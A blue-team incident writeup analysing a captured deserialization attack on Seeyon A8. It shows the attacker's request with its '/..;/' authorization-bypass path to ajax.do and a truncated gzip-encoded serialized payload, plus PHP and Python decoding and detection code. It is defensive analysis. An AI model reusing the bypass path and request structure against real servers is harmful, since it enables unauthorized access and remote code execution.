Seeyon A8 (致远A8) 0day deserialization (captured by the blue team on September 20)
Around 00:00 on September 20, 2020, the honeypot device raised an attack alert. After tracing it back, the following request packet was captured on the full-traffic capture device:
POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=7B6D8C106BD599DB0EF2F2E3B794A4FA; loginPageURL=; login_locale=zh_CN;
Content-Type: application/x-www-form-urlencoded
Content-Length: 8819

managerMethod=validate&arguments=%1F%C2%8B%08[remainder of the URL-encoded gzip payload omitted]

HTTP/1.1 500
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 51
Date: Wed, 16 Sep 2020 08:46:20 GMT
Connection: close
Server: SY8045
Set-Cookie: BIGipServer~CMEW-PRD-DMZ~pool_cmew-pms-lb_http80_CMEW-PRD-DMZ_prd=rd62o00000000000000000000ffff644e0303o80; path=/; Httponly

{"message":null,"code":"0245981157","details":null}
Analysis of the traffic capture shows that the attack took place at 4 pm on September 16; the details of the tracing are not covered here. Analysing the request URL shows that an authorization-bypass request was used to reach the ajax.do file under the Seeyon root directory:
/seeyon/autoinstall.do.css/..;/ajax.do
The request body carries two parameters, managerMethod and arguments. managerMethod=validate is a fixed value, while arguments is attacker-controlled and holds the serialized string.
In the request packet the payload is first gzip-compressed, then latin1-encoded (each raw byte becomes one character, emitted as UTF-8), and finally URL-encoded.
A PHP decoding script is provided below:
<?php
$s = 'string'; // paste the arguments value here
// undo the chain in reverse: URL-decode, map UTF-8 characters back to latin1 bytes, then gunzip
echo gzdecode(iconv('utf-8', 'latin1', urldecode($s)));
?>
The request has the following characteristics:
1. /..;/ appears in the URL, which causes the authorization bypass;
2. when requestCompress=gzip appears in the URL, the request body contains
managerMethod=validate&arguments=%1F%C2%8B%08
where %1F%C2%8B%08 is the gzip header; it is suspected that other file formats could be used as well.
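A Python version of the decoding chain and a check for the request characteristics listed above, as an added example that is not part of the original writeup. The sample body is constructed with a harmless payload in place of the captured one, and the function names are my own.

```python
import gzip
from urllib.parse import parse_qs, quote, unquote, urlsplit

GZIP_MAGIC = b"\x1f\x8b\x08"  # the %1F%C2%8B%08 prefix seen in the captured body

def encode_arguments(raw: bytes) -> str:
    # Forward chain as described in the writeup: gzip -> treat each byte as a
    # latin1 character -> emit as UTF-8 -> URL-encode. Used only to build a sample.
    return quote(gzip.compress(raw).decode("latin1").encode("utf-8"), safe="")

def decode_arguments(value: str) -> bytes:
    # Reverse chain (same as the PHP script): URL-decode as UTF-8, map each
    # character back to one latin1 byte, then gunzip.
    raw = unquote(value).encode("latin1")
    if not raw.startswith(GZIP_MAGIC):
        raise ValueError("arguments value does not start with the gzip header")
    return gzip.decompress(raw)

def flag_request(request_line: str, body: str) -> list:
    # Returns which of the writeup's indicators this request matches.
    findings = []
    _method, target, _version = request_line.split(" ", 2)
    if "/..;/" in target:
        findings.append("url contains /..;/ (authorization bypass)")
    query = parse_qs(urlsplit(target).query)
    if query.get("requestCompress") == ["gzip"]:
        form = parse_qs(body, keep_blank_values=True)
        args = form.get("arguments", [""])[0]  # parse_qs already URL-decodes
        if form.get("managerMethod") == ["validate"] and args.startswith(GZIP_MAGIC.decode("latin1")):
            findings.append("managerMethod=validate with gzip-compressed arguments")
    return findings

# Constructed sample: the captured request line with a harmless payload instead of the real one
SAMPLE_REQUEST_LINE = ("POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction"
                       "&managerName=formulaManager&requestCompress=gzip HTTP/1.1")
SAMPLE_BODY = "managerMethod=validate&arguments=" + encode_arguments(b"constructed sample, not the real payload")

if __name__ == "__main__":
    for hit in flag_request(SAMPLE_REQUEST_LINE, SAMPLE_BODY):
        print("match:", hit)
    # take the still URL-encoded value straight from the body, as one would from a capture
    print(decode_arguments(SAMPLE_BODY.split("arguments=", 1)[1]))
```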